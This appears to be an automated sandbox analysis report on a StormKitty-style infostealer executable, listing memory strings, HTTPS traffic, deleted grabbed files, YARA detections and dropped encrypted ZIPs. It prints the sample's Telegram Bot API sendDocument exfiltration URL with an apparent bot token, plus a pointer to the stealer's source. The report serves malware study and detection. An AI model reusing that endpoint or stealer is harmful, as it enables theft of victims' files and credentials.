Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: B5U2ccQ8H1.exe	String found in binary or memory: http://ip-api.com/xml
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/xmld
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.comd
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipif$
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A63000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/d
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: B5U2ccQ8H1.exe	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id==&caption=====
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgd
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.vimeworld.ru/user/name/
Source: B5U2ccQ8H1.exe	String found in binary or memory: https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://assets.dropbox.com/www/en-us/illustrations/spot/traffic-u-turn.svg
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/images/favicon.ico
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.dropboxusercontent.com/s/n41axwfwvc7fb8d/image.png?dl=1
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://forums.dropbox.com
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://freegeoip.app/xml/
Source: B5U2ccQ8H1.exe	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: B5U2ccQ8H1.exe	String found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr, History.txt0.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000272A000.00000004.00000800.00020000.00000000.sdmp, tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr, History.txt0.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/help
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/home
Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.dropbox.com/login
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: History.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: places.raw.0.dr, tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: places.raw.0.dr, tmpC004.tmp.dat.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49750 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: B5U2ccQ8H1.exe, Screen.cs

.Net Code: GetScreen

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File deleted: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\KATAXZVCPS.jpg	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File deleted: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\ONBQCLYSPU\UMMBDNEQBN.pdf	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File deleted: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File deleted: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	File deleted: C:\Users\user\AppData\Roaming\928100\FileGrabber\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: B5U2ccQ8H1.exe, type: SAMPLE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects A310Logger Author: ditekSHen
Source: 00000000.00000000.1658789791.00000000002F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: B5U2ccQ8H1.exe PID: 7340, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Drops password protected ZIP file

Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted
Source: DotNetZip-scqqjqvm.tmp.0.dr	Zip Entry: encrypted

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2709A	0_2_00E2709A
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2D461	0_2_00E2D461
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E23CD0	0_2_00E23CD0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2C052	0_2_00E2C052
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2C4A8	0_2_00E2C4A8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E287C0	0_2_00E287C0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E287D0	0_2_00E287D0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E219C0	0_2_00E219C0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E219D0	0_2_00E219D0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E23CC0	0_2_00E23CC0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2CEE0	0_2_00E2CEE0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_00E2CED0	0_2_00E2CED0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C70040	0_2_04C70040
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C70007	0_2_04C70007
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C7C148	0_2_04C7C148
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C7C158	0_2_04C7C158
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C75920	0_2_04C75920
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C75930	0_2_04C75930
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C7FA58	0_2_04C7FA58
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF3DD0	0_2_04DF3DD0
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFBE02	0_2_04DFBE02
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFEE00	0_2_04DFEE00
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF47B8	0_2_04DF47B8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF5858	0_2_04DF5858
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF0040	0_2_04DF0040
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF29BA	0_2_04DF29BA
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFCAA1	0_2_04DFCAA1
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFDC10	0_2_04DFDC10
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFDC20	0_2_04DFDC20
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF5D91	0_2_04DF5D91
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFF698	0_2_04DFF698
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF67B8	0_2_04DF67B8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF67A8	0_2_04DF67A8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DF0007	0_2_04DF0007
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E03010	0_2_04E03010
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E032EF	0_2_04E032EF
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E03840	0_2_04E03840
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E00040	0_2_04E00040
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E03001	0_2_04E03001
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E04EF8	0_2_04E04EF8
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E00640	0_2_04E00640
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E04BC0	0_2_04E04BC0
